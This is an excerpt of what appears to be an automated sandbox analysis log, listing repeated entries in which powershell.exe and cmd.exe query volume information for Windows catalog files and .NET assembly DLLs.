                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
